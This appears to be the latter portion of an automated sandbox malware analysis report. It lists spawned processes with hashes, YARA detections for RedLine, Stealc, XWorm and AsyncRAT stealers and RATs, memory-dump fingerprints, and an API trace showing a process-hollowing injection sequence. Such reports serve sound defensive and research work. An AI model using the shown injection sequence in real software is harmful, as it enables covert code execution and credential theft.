                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:29
                                                                          Start time:22:21:26
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x2e0000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:22:21:26
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x3c0000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:22:21:26
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x500000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:22:21:26
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\svchost015.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\svchost015.exe
                                                                          Imagebase:0x400000
                                                                          File size:2'990'472 bytes
                                                                          MD5 hash:B826DD92D78EA2526E465A34324EBEEA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000020.00000000.2916373422.0000000000401000.00000020.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:34
                                                                          Start time:22:21:27
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
                                                                          Imagebase:0x6b0000
                                                                          File size:360'448 bytes
                                                                          MD5 hash:2F1D09F64218FFFE7243A8B44345B27E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:22:21:30
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
                                                                          Imagebase:0xc20000
                                                                          File size:311'296 bytes
                                                                          MD5 hash:58E8B2EB19704C5A59350D4FF92E5AB6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000002.3153539765.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:22:21:32
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
                                                                          Imagebase:0xca0000
                                                                          File size:986'112 bytes
                                                                          MD5 hash:1EF39C8BC5799AA381FE093A1F2D532A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.3164599118.0000000006610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.3009810672.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Has exited:true

                                                                          Target ID:37
                                                                          Start time:22:21:34
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                          Imagebase:0x410000
                                                                          File size:42'064 bytes
                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Has exited:false

                                                                          Target ID:38
                                                                          Start time:22:21:35
                                                                          Start date:26/09/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
                                                                          Imagebase:0x510000
                                                                          File size:367'616 bytes
                                                                          MD5 hash:6B470F7251AA9C14D7DAEA8F6446E217
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:39
                                                                          Start time:22:21:35
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:40
                                                                          Start time:22:21:38
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                          Imagebase:0x7ff7e52b0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:41
                                                                          Start time:22:21:38
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
                                                                          Imagebase:0xde0000
                                                                          File size:483'680 bytes
                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:42
                                                                          Start time:22:21:38
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x360000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:43
                                                                          Start time:22:21:38
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x580000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:44
                                                                          Start time:22:21:38
                                                                          Start date:26/09/2024
                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
                                                                          Imagebase:0xde0000
                                                                          File size:483'680 bytes
                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Reset < >
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cddf2fe302a7f87153dbc4e721eb1e7637394385d899595b727d288b1a07b9ab
                                                                            • Instruction ID: fdf796608640a0535e0272641fe57640be4769bc1f3f528a52536da93318024a
                                                                            • Opcode Fuzzy Hash: cddf2fe302a7f87153dbc4e721eb1e7637394385d899595b727d288b1a07b9ab
                                                                            • Instruction Fuzzy Hash: E0018BB710C210BD7151C2122B1CBFB2B2AE2D23713B0993BF40BE84C6C2B50B5BA132
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 77b1fb4450f88549d8cef7a10070bad2c9f34e47bea66df54b728deafbbc2bf5
                                                                            • Instruction ID: 8429ed7cda6e83683b3432f6771a6cbaac3409cdb1531f5e76b76aa3e3f80ce3
                                                                            • Opcode Fuzzy Hash: 77b1fb4450f88549d8cef7a10070bad2c9f34e47bea66df54b728deafbbc2bf5
                                                                            • Instruction Fuzzy Hash: C51159EB11C124BE7052D1522B18BFB6A2EE1E27303B09537F85BE5586D2F80F5B6172
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84a0df47d66b6bcb40d3ffa939d26b1b4abff63faa49666b3f73b1280795fdc9
                                                                            • Instruction ID: f5ad649888c97b53c60a1a81e3bfbc81fa1b4705fdd687b114387df888bfa929
                                                                            • Opcode Fuzzy Hash: 84a0df47d66b6bcb40d3ffa939d26b1b4abff63faa49666b3f73b1280795fdc9
                                                                            • Instruction Fuzzy Hash: CA118CEB11C124BD6052D1522B18AFB6A2EE1D27303719537F84BE6586D2F80F5B2172
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cb8ec3bbe79fad78c7486b50d100579387bfcb7ac9052ba2cbb62379c71ae4de
                                                                            • Instruction ID: 8bf4ee8b75c74be93ed5836f9b4e804dc5376cc1ff0ccca239f148b18356c47d
                                                                            • Opcode Fuzzy Hash: cb8ec3bbe79fad78c7486b50d100579387bfcb7ac9052ba2cbb62379c71ae4de
                                                                            • Instruction Fuzzy Hash: 65116AAB11C110AD6052D1512B2CBFB6B2EE1D6B313B0A937F40FE45C692F80B5B2071
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cf0b09e0670e9c37de434605b52ac8e600a74a341d7ed05b09e09bd1da42c264
                                                                            • Instruction ID: dfaf8aa15669f679045acb34fcd964f0e5fe86f38a8269d9e4af73335018d2a6
                                                                            • Opcode Fuzzy Hash: cf0b09e0670e9c37de434605b52ac8e600a74a341d7ed05b09e09bd1da42c264
                                                                            • Instruction Fuzzy Hash: 161191A711C110BE6141C1516A5CBFB6B2AE2D6730370953BF44BD54C6D2F80B5B6172
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3bf176a28f1daa478207c9320d229f22eeb49514949abca7acbb9f8080b0c9f5
                                                                            • Instruction ID: 5a1fb6736dc55909aa27366b15956e57db85ad046c118a0e3c7b13c5ff8a9666
                                                                            • Opcode Fuzzy Hash: 3bf176a28f1daa478207c9320d229f22eeb49514949abca7acbb9f8080b0c9f5
                                                                            • Instruction Fuzzy Hash: AD01ADE710C110AD6151D1612A1CBFB672FE1D27703B09A37F05BD85C6D2B50B5B6172
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bd22223d4a69cfec29c8690cdfe5f51c259f76488155e60542f65a9570502f5
                                                                            • Instruction ID: b77a56d8e30f506a3ecfc72aa93e603c06239eb91151ed02df81015d7ed6d0a0
                                                                            • Opcode Fuzzy Hash: 7bd22223d4a69cfec29c8690cdfe5f51c259f76488155e60542f65a9570502f5
                                                                            • Instruction Fuzzy Hash: 2F01FEB710D1606EB14281612E58FFA6B2DD4C36713754577F40AC6487C2980B5FA272
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e182e94acf249c2af84607ff68ceea9980041613732fc52a5ae35a181ec9fe9e
                                                                            • Instruction ID: 7f56c0950c2e9f71f56a1a0f44e88d3685d2316142ad7dd5b0201cee7afa3b44
                                                                            • Opcode Fuzzy Hash: e182e94acf249c2af84607ff68ceea9980041613732fc52a5ae35a181ec9fe9e
                                                                            • Instruction Fuzzy Hash: 29015AEB10D110BD7041D1622B1CBFB6A2EE1D26713B19A37F44BD44C992A90B9B6072
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d293786c63ce3835b6ec0b772c6b32a01399ced6f055fa711af8e7dedeac3113
                                                                            • Instruction ID: 38fd73c5909d7a7c31c6a88514bf4424ef63a9736a06a6a1e926356c55c81c99
                                                                            • Opcode Fuzzy Hash: d293786c63ce3835b6ec0b772c6b32a01399ced6f055fa711af8e7dedeac3113
                                                                            • Instruction Fuzzy Hash: 12018FEB10C110AD7051D1622B58BF75B6EE1E67313B0A537F00BC95CA92E80B8B7031
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a92b105f41d8c7210130c572fd22e2ca1cb6bf8b43f7f28d8728271835c2523
                                                                            • Instruction ID: 46cdc9c8c0acffaad72198618e829a68293b12d6bb99d24e956c1c5d67ac63b0
                                                                            • Opcode Fuzzy Hash: 9a92b105f41d8c7210130c572fd22e2ca1cb6bf8b43f7f28d8728271835c2523
                                                                            • Instruction Fuzzy Hash: 250126EB08C600EDA641C55A524D7F53F6FF6972313F0613BE40F48983A6F5460B81D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 207455103174a51af7699c686d0aa7740992e23c6db5043b0abf060290773d33
                                                                            • Instruction ID: 99b588673db8bef624d87d9ae847d1637d25ee3146cee0b7ef4dff6e21bc3cf4
                                                                            • Opcode Fuzzy Hash: 207455103174a51af7699c686d0aa7740992e23c6db5043b0abf060290773d33
                                                                            • Instruction Fuzzy Hash: ED0147DB0CC354EDA603D661424C7F23F6BB6132303B07037E08F99A83A2F80A4B9591

                                                                            Execution Graph

                                                                            Execution Coverage:39.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:16.2%
                                                                            Total number of Nodes:37
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 281 27a24d9 282 27a2511 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 281->282 284 27a26ee WriteProcessMemory 282->284 285 27a2733 284->285 286 27a2738 WriteProcessMemory 285->286 287 27a2775 WriteProcessMemory Wow64SetThreadContext ResumeThread 285->287 286->285 288 9c0988 289 9c099b 288->289 297 9c0b2a 289->297 290 9c09b3 294 9c0a49 290->294 302 9c04e4 290->302 295 9c0a20 298 9c0b4e 297->298 299 9c0e27 298->299 300 9c0e93 VirtualProtectEx 298->300 299->290 301 9c0ed3 300->301 301->290 303 9c0e48 VirtualProtectEx 302->303 305 9c09f4 303->305 305->294 306 9c04f0 305->306 307 9c0f00 CreateThread 306->307 309 9c0fa8 307->309 309->295 310 9c0978 311 9c099b 310->311 318 9c0b2a VirtualProtectEx 311->318 312 9c09b3 313 9c0a49 312->313 314 9c04e4 VirtualProtectEx 312->314 315 9c09f4 314->315 315->313 316 9c04f0 CreateThread 315->316 317 9c0a20 316->317 318->312 323 9c0efa 324 9c0f4e CreateThread 323->324 326 9c0fa8 324->326 319 9c04d0 320 9c04d5 VirtualProtectEx 319->320 322 9c0ed3 320->322

                                                                            Callgraph

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027A2648
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027A265B
                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 027A2679
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027A269D
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 027A26C8
                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027A2720
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 027A276B
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027A27A9
                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 027A27E5
                                                                            • ResumeThread.KERNELBASE(?), ref: 027A27F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2695465041.00000000027A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_27a2000_gold.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                            • String ID: GetP$Load$aryA$ress
                                                                            • API String ID: 2687962208-977067982
                                                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                            • Instruction ID: 0a33184ce9a69c7304ed0e6c67e1367e79225172ff16a292b763199553c92e62
                                                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                            • Instruction Fuzzy Hash: 22B1E57660024AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB342D774FA41CB94

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 23 9c0b2a-9c0b7d 27 9c0c08-9c0c16 23->27 28 9c0b83-9c0b86 23->28 29 9c0c1c 27->29 30 9c0ca5-9c0cb6 27->30 32 9c0b8e-9c0bb3 28->32 31 9c0c1f-9c0c24 29->31 33 9c0cbc-9c0cc5 30->33 34 9c0e27-9c0e2e 30->34 35 9c0c2a-9c0c3a 31->35 36 9c0e31-9c0ed1 VirtualProtectEx 31->36 32->36 60 9c0bb9-9c0bda 32->60 37 9c0cce-9c0cd9 33->37 38 9c0cc7-9c0ccd 33->38 35->36 40 9c0c40-9c0c4c 35->40 53 9c0ed8-9c0eec 36->53 54 9c0ed3 36->54 37->36 39 9c0cdf-9c0ceb 37->39 38->37 42 9c0ced-9c0cf3 39->42 43 9c0cf4-9c0cfb 39->43 44 9c0c4e-9c0c54 40->44 45 9c0c55-9c0c5c 40->45 42->43 43->36 47 9c0d01-9c0d0b 43->47 44->45 45->36 48 9c0c62-9c0c6c 45->48 47->36 51 9c0d11-9c0d1b 47->51 48->36 52 9c0c72-9c0c7c 48->52 51->36 55 9c0d21-9c0d27 51->55 52->36 56 9c0c82-9c0c88 52->56 54->53 55->36 58 9c0d2d-9c0d39 55->58 56->36 59 9c0c8e-9c0c9f 56->59 58->36 61 9c0d3f-9c0d51 58->61 59->30 59->31 60->36 62 9c0be0-9c0bee 60->62 64 9c0d5b-9c0d87 61->64 65 9c0d53-9c0d5a 61->65 62->36 63 9c0bf4-9c0c02 62->63 63->27 63->28 68 9c0d89-9c0d8e 64->68 69 9c0d96-9c0da0 64->69 65->64 68->69 69->36 70 9c0da6-9c0daf 69->70 70->36 71 9c0db5-9c0dd4 70->71 72 9c0dd6-9c0ddb 71->72 73 9c0de3-9c0ded 71->73 72->73 73->36 74 9c0def-9c0df4 73->74 74->36 75 9c0df6-9c0e21 74->75 75->33 75->34
                                                                            APIs
                                                                            • VirtualProtectEx.KERNELBASE(?,037A3594,00000040,?,?), ref: 009C0EC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_9c0000_gold.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: dfeaf37207134063476265e6c906356371d83a08dd8e07a14cb23918e0afd2c2
                                                                            • Instruction ID: 3eb68464de617a580772702702e8ebd9e149f2b14b79bd27542dc86b87be3883
                                                                            • Opcode Fuzzy Hash: dfeaf37207134063476265e6c906356371d83a08dd8e07a14cb23918e0afd2c2
                                                                            • Instruction Fuzzy Hash: F4C17F70E4426ADFCB01CFA9C480AADFBF1BF89314F548999D858E7256C374A941CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 78 9c0efa-9c0f5a 80 9c0f5c-9c0f68 78->80 81 9c0f6a-9c0fa6 CreateThread 78->81 80->81 82 9c0faf-9c0fc3 81->82 83 9c0fa8-9c0fae 81->83 83->82
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 009C0F99
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_9c0000_gold.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 89dc549e5e520ab11ae4b6e855496425fd00a3cf8c1cd39a9b8b1b9151daa5b8
                                                                            • Instruction ID: 31c2c5b6021a14c1172f00fb8d9766fa98a2da48017b1203009d2f1688205831
                                                                            • Opcode Fuzzy Hash: 89dc549e5e520ab11ae4b6e855496425fd00a3cf8c1cd39a9b8b1b9151daa5b8
                                                                            • Instruction Fuzzy Hash: F22102B59002499FCB10CF9AD984ADEBBF4FF48310F20842EE859A7350D374AA44CFA1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 85 9c04f0-9c0f5a 88 9c0f5c-9c0f68 85->88 89 9c0f6a-9c0fa6 CreateThread 85->89 88->89 90 9c0faf-9c0fc3 89->90 91 9c0fa8-9c0fae 89->91 91->90
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 009C0F99
                                                                            Memory Dump Source
